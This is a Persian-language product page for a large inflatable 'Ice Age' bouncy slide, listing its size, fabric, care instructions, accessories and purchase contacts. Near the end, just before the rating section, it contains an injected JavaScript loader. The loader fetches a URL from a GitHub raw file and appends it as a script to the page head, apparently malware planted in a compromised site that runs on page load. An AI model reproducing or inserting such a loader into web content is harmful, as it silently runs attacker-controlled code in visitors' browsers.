سرسره بادی بزرگ عصر یخبندان
سرسره بادی بزرگ عصر یخبندان

سرسره بادی بزرگ عصر یخبندان

  • سرسره بادی بزرگ عصر یخبندان یک قصر بادی دو سر جدید از تولیدی بزرگ بادی سازان مجد است. این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد.

    ابعاد اندازه

    طول قصر بادی عصر یخبندان 9 متر و عرض آن 7 متر می باشد. همچنین ارتفاع این سرسره بادی به 7.5 متر می رسد که در فضاهایی باز استفاده می شود. همچنین جهت حمل نقل باید بدانید وزن کلی این سرسره 400 کیلوگرم می باشد.

    جنس پارچه

    جنس پارچه از با کیفیت ترین پارچه کره ای است که به صورت یک لایه ضخیم ساخته شده تا در برابر فشار بالای هوا مقاوم باشد. همچنین کیفیت این پارچه به دور از پوسدگی زودرس است.

    نحوه شستشوی و نگهداری

    نهگداری و شستشوی دستگاه های بادی همه مثل هم هستند. باید بدانید که برای شستشوی سرسره بادی بزرگ عصر یخبندان فقط و فقط از آب استفاده کنید اگر از مواد شوینده مانند ریکا، وایتکس و … باعث پوسیدگی دستگاه می شود. برای نهگداری نکاتی هستند که باید شما بدانید. به هیچ وجه دستگاه ها را در هوای بارانی و طوفانی دستگاه ها را باد نکید، و هچنیین در صورت که هوای دستگاه رو تخلیه کردید روی آن روکش بکشید. نکته حتما دستگاه را با بند های که روی خود دستگاه هست با میخ های بزرگ به زمین ببندین.

    لوازم جانبی

    این دستگاه شامل روکش سر میباشد که روی سرسره هست. دستگاه نیاز به یک دمنده هوا ( پمپ باد ) یک نیم دارد که می توانید از هیمن سایت خریداری کنید.

    طرح و رنگ سرسره بادی بزرگ عصر یخبندان

    طرح قصر بادی عصر یخبندان که در حال حاضر تنها یک طرح آن قابل تولید است و به صورت تک طرح عرضه می شود. همچنین شمال روکش سر است که با توجه به موجودی انبار و کیفیت مناسب برای هر بخش دوخته می شود. چاپ این سرسره بادی به صورت نانو است که رنگ آن در طول زمان از بین نرود. برای کسب اطلاعات بیشتر می توانید با شماره تلفن 09127484573 تماس حاصل نمایید.

    نحوه خرید سرسره بادی بزرگ عصر یخبندان

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خریدقصر بادی عصر یخبندان توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید